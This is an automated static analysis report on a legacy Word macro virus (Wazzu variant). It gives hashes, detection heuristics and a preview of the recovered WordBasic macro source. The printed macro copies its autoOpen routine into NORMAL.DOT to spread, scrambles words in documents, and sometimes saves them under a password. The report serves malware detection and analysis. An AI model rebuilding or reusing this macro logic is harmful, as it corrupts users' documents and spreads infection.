Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4dc9da33b5bb6f56…

MALICIOUS

Office (OLE)

Size: 7.0 KB
First seen: 2012-06-14
MD5: e83c40bd4e9bf155462bd8d2cbff524f
SHA-1: f3afb69d67d9dc2bebedfd3f3844406c47bec22e
SHA-256: 4dc9da33b5bb6f564595084bacf15c7f72067fe8e2864dea3beff866a0be5435
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS', and includes embedded text that appears to be part of a macro designed to manipulate document content and potentially password-protect the file. The presence of these markers and the nature of the embedded text strongly suggest a malicious macro-based document.

Heuristics (3)

  • ClamAV: Doc.Trojan.Wazzu-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-1
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 1152 bytes
SHA-256: 20ef829dd9cff6f481fade64247d378f4f7e5d9a8d20ab44847e2fc260daa80b
Preview script (first 1,000 lines of the extracted script)
8300   ,  
    10272 25199 8233 29793  
      24933 8300
MAIN
Naproxen
REM  Macro inserts words or moves random words based on random generated 
REM  number. If you're really lucky, it'll password save the file.
REM *********************************************************************
REM *********************************************************************
Naproxen
@cmd806f 1
, - * errCaught
@cmd0056
dlg @cmd0056
dlg
fileMacro$ = dlg = "\" = dlg @cmd0700 ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = @cmd80af @cmd8009 @cmd818e @cmd80b8 0 , 10
MacroFile$ = "NORMAL.DOT"
@cmd80c2 globMacro$ , fileMacro$
@cmd0054 = 1
@cmd80c2 fileMacro$ , globMacro$
Nuku = @cmd8002 @cmd800e 100
Nuku 0
Rndword
Nuku = 0
LockIt
* bye @cmd7468
, - * 0
RndWord
@cmd8111 0
@cmd0056
dlg @cmd004e
dlg
GMTE1 = @cmd8002 @cmd800e @cmd8006 dlg
GMTE2 = @cmd8002 @cmd800e @cmd8006 dlg
@cmdc010
@cmdc003 GMTE1
@cmd8116
@cmd0012
@cmdc003 GMTE2
@cmd0047
@cmdc010
@cmd8111 1
@cmd0299
LockIt
@cmd8111 0
@cmd0056
dlg @cmd004e
dlg
@cmd8006 dlg 150
@cmd00d1 = 0 , = 1 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "10" , = "HI" , = , = 0
@cmd0053
@cmdc010
@cmd8111 1
@cmd0299